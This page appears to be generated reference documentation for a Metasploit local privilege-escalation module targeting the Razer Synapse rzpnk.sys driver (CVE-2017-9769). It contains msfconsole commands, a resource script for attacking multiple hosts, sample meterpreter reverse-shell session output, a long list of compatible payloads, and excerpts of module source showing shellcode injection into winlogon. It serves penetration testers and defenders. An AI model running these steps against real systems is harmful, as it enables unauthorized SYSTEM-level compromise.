Razer Synapse rzpnk.sys ZwOpenProcess - Metasploit
This page contains detailed information about how to use the exploit/windows/local/razer_zwopenprocess metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Razer Synapse rzpnk.sys ZwOpenProcess
Module: exploit/windows/local/razer_zwopenprocess
Source code: modules/exploits/windows/local/razer_zwopenprocess.rb
Disclosure date: 2017-03-22
Last modification time: 2021-09-08 21:56:02 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-9769
A vulnerability exists in the latest version of Razer Synapse (v2.20.15.1104 as of the day of disclosure) which can be leveraged locally by a malicious application to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver that passes a PID specified by the user to ZwOpenProcess. This can be issued by an application to open a handle to an arbitrary process with the necessary privileges to allocate, read and write memory in the specified process. This exploit leverages this vulnerability to open a handle to the winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by installing a hook to execute attacker controlled shellcode. This hook is then triggered on demand by calling user32!LockWorkStation(), resulting in the attacker's payload being executed with the privileges of the infected winlogon process. In order for the issued IOCTL to work, the RazerIngameEngine.exe process must not be running. This exploit will check if it is, and attempt to kill it as necessary. The vulnerable software can be found here: https://www.razerzone.com/synapse/. No Razer hardware needs to be connected in order to leverage this vulnerability. This exploit is not opsec-safe due to the user being logged out as part of the exploitation process.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-service-restarts: Module may crash the service, but the service restarts.
Side Effects:
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
Using razer_zwopenprocess against a single host
Normally, you can use exploit/windows/local/razer_zwopenprocess this way:
msf > use exploit/windows/local/razer_zwopenprocess
msf exploit(razer_zwopenprocess) > show targets
... a list of targets ...
msf exploit(razer_zwopenprocess) > set TARGET target-id
msf exploit(razer_zwopenprocess) > show options
... show and set options ...
msf exploit(razer_zwopenprocess) > exploit
Using razer_zwopenprocess against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your razer_zwopenprocess will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/windows/local/razer_zwopenprocess")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the windows/local/razer_zwopenprocess exploit module looks in the msfconsole:
msf6 > use exploit/windows/local/razer_zwopenprocess
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/razer_zwopenprocess) > show info
Name: Razer Synapse rzpnk.sys ZwOpenProcess
Module: exploit/windows/local/razer_zwopenprocess
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-03-22
Provided by:
Spencer McIntyre
Module side effects:
screen-effects
Module stability:
crash-service-restarts
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Windows x64
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload information:
Description:
A vulnerability exists in the latest version of Razer Synapse
(v2.20.15.1104 as of the day of disclosure) which can be leveraged
locally by a malicious application to elevate its privileges to
those of NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific
IOCTL handler in the rzpnk.sys driver that passes a PID specified by
the user to ZwOpenProcess. This can be issued by an application to
open a handle to an arbitrary process with the necessary privileges
to allocate, read and write memory in the specified process. This
exploit leverages this vulnerability to open a handle to the
winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it
by installing a hook to execute attacker controlled shellcode. This
hook is then triggered on demand by calling
user32!LockWorkStation(), resulting in the attacker's payload being
executed with the privileges of the infected winlogon process. In
order for the issued IOCTL to work, the RazerIngameEngine.exe
process must not be running. This exploit will check if it is, and
attempt to kill it as necessary. The vulnerable software can be
found here: https://www.razerzone.com/synapse/. No Razer hardware
needs to be connected in order to leverage this vulnerability. This
exploit is not opsec-safe due to the user being logged out as part
of the exploitation process.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-9769
https://warroom.securestate.com/cve-2017-9769/
Module Options
This is a complete list of options available in the windows/local/razer_zwopenprocess exploit:
msf6 exploit(windows/local/razer_zwopenprocess) > show options
Module options (exploit/windows/local/razer_zwopenprocess):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
Advanced Options
Here is a complete list of advanced options supported by the windows/local/razer_zwopenprocess exploit:
msf6 exploit(windows/local/razer_zwopenprocess) > show advanced
Module advanced options (exploit/windows/local/razer_zwopenprocess):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 20 no Additional delay in seconds to wait for a session
Payload advanced options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/local/razer_zwopenprocess module can exploit:
msf6 exploit(windows/local/razer_zwopenprocess) > show targets
Exploit targets:
Id Name
-- ----
0 Windows x64
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/razer_zwopenprocess exploit:
msf6 exploit(windows/local/razer_zwopenprocess) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/windows/x64/exec normal No Windows x64 Execute Command
4 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
5 payload/windows/x64/messagebox normal No Windows MessageBox x64
6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
20 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
21 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
22 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
23 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
24 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
25 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
26 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
27 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
28 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
29 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
30 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
31 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
32 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
33 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
34 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
35 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
36 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
37 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
38 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
39 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
40 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
41 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
42 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
43 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
44 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
45 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
46 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
47 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
48 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
49 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
50 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
51 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
52 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
53 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
54 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
55 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
56 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
57 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
58 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
59 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
60 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
61 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
62 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/local/razer_zwopenprocess exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/local/razer_zwopenprocess) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Session is already elevated
- Exploit not available on this system.
- This exploit requires a native Windows meterpreter session
- This exploit only supports x64 Windows targets
- Failed to open the process handle
- Failed to get a handle to user32.dll
- Failed to generate the hook stub
- The hook stub is too large, please update HOOK_STUB_MAX_LENGTH
- Failed to get function address
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Session is already elevated
Here is a relevant code snippet related to the "Session is already elevated" error message:
108: Exploit::CheckCode::Safe
109: end
110:
111: def exploit
112: if is_system?
113: fail_with(Failure::None, 'Session is already elevated')
114: end
115:
116: if check == Exploit::CheckCode::Safe
117: fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
118: end
Exploit not available on this system.
Here is a relevant code snippet related to the "Exploit not available on this system." error message:
112: if is_system?
113: fail_with(Failure::None, 'Session is already elevated')
114: end
115:
116: if check == Exploit::CheckCode::Safe
117: fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
118: end
119:
120: if session.platform != 'windows'
121: fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
122: elsif session.arch != ARCH_X64
This exploit requires a native Windows meterpreter session
Here is a relevant code snippet related to the "This exploit requires a native Windows meterpreter session" error message:
116: if check == Exploit::CheckCode::Safe
117: fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
118: end
119:
120: if session.platform != 'windows'
121: fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
122: elsif session.arch != ARCH_X64
123: fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
124: end
125:
126: pid = session.sys.process['RazerIngameEngine.exe']
This exploit only supports x64 Windows targets
Here is a relevant code snippet related to the "This exploit only supports x64 Windows targets" error message:
118: end
119:
120: if session.platform != 'windows'
121: fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
122: elsif session.arch != ARCH_X64
123: fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
124: end
125:
126: pid = session.sys.process['RazerIngameEngine.exe']
127: if pid
128: # if this process is running, the IOCTL won't work but the process runs
Failed to open the process handle
Here is a relevant code snippet related to the "Failed to open the process handle" error message:
133:
134: pid = session.sys.process['winlogon.exe']
135: print_status("Found winlogon pid: #{pid}")
136:
137: handle = get_handle(pid)
138: fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
139: vprint_status('Successfully opened a handle to the winlogon process')
140:
141: winlogon = session.sys.process.new(pid, handle)
142: allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
143: shellcode_address = winlogon.memory.allocate(allocation_size)
Failed to get a handle to user32.dll
Here is a relevant code snippet related to the "Failed to get a handle to user32.dll" error message:
145: print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
146: winlogon.memory.write(shellcode_address, payload.encoded)
147: hook_stub_address = shellcode_address + payload.encoded.length
148:
149: result = session.railgun.kernel32.LoadLibraryA('user32')
150: fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
151: user32_handle = result['return']
152:
153: # resolve and backup the functions that we'll install trampolines in
154: user32_trampolines = {} # address => original chunk
155: user32_functions = ['LockWindowStation']
Failed to generate the hook stub
Here is a relevant code snippet related to the "Failed to generate the hook stub" error message:
162: }
163: end
164:
165: # generate and install the hook asm
166: hook_stub = get_hook(shellcode_address, user32_trampolines)
167: fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
168: # if this happens, there was a programming error
169: fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
170:
171: winlogon.memory.write(hook_stub_address, hook_stub)
172: vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
The hook stub is too large, please update HOOK_STUB_MAX_LENGTH
Here is a relevant code snippet related to the "The hook stub is too large, please update HOOK_STUB_MAX_LENGTH" error message:
164:
165: # generate and install the hook asm
166: hook_stub = get_hook(shellcode_address, user32_trampolines)
167: fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
168: # if this happens, there was a programming error
169: fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
170:
171: winlogon.memory.write(hook_stub_address, hook_stub)
172: vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
173:
174: # install the asm trampolines to jump to the hook
Failed to get function address
Here is a relevant code snippet related to the "Failed to get function address" error message:
188: session.railgun.kernel32.CloseHandle(handle)
189: end
190:
191: def get_address(dll_handle, function_name)
192: result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
193: fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0
194: result['return']
195: end
196:
197: # this is where the actual vulnerability is leveraged
198: def get_handle(pid)
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #10873 Merged Pull Request: Add applicable notes to my exploit modules
- #8723 Merged Pull Request: Module for Razer Synapse (CVE-2017-9769)
References
See Also
Check also the following modules related to this module:
Authors
Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.